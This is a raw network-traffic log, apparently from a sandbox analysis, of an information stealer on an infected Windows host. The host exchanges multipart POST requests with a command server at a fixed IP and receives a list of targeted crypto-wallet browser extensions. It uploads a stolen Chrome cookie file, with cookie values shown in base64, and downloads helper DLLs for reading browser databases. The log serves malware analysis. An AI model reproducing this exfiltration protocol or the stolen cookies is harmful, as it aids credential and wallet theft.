------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="message"plugins------IDBGHDGHCGHCAAKFIIEC--
Oct 2, 2024 23:10:02.631354094 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 2, 2024 23:10:02.631426096 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 2, 2024 23:10:02.631464005 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 2, 2024 23:10:02.632601976 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 2, 2024 23:10:02.632636070 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 2, 2024 23:10:02.633800030 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Oct 2, 2024 23:10:02.635200977 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="message"fplugins------DBKKFHIEGDHJKECAAKKE--
Oct 2, 2024 23:10:02.854631901 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:02 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 2, 2024 23:10:02.867660046 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK Host: 185.215.113.37 Content-Length: 6499 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 23:10:02.867698908 CEST	6499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 2, 2024 23:10:03.725023031 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:03.964662075 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:04.204886913 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:04 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 2, 2024 23:10:04.205007076 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 2, 2024 23:10:04.205043077 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 2, 2024 23:10:04.207081079 CEST	1236	IN	Data Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31 Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
Oct 2, 2024 23:10:05.509704113 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------AAFHIIDHJEBFBFIDAKFB--
Oct 2, 2024 23:10:06.233128071 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:06.314862967 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGD Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Oct 2, 2024 23:10:07.035152912 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:08.271696091 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file"------CGDHIEGCFHCGDGCAECBG--
Oct 2, 2024 23:10:08.996546984 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 23:10:10.442385912 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:10.665605068 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 2, 2024 23:10:11.527565002 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 2, 2024 23:10:11.755419016 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 21:10:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 2, 2024 23:10:12.188235044 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
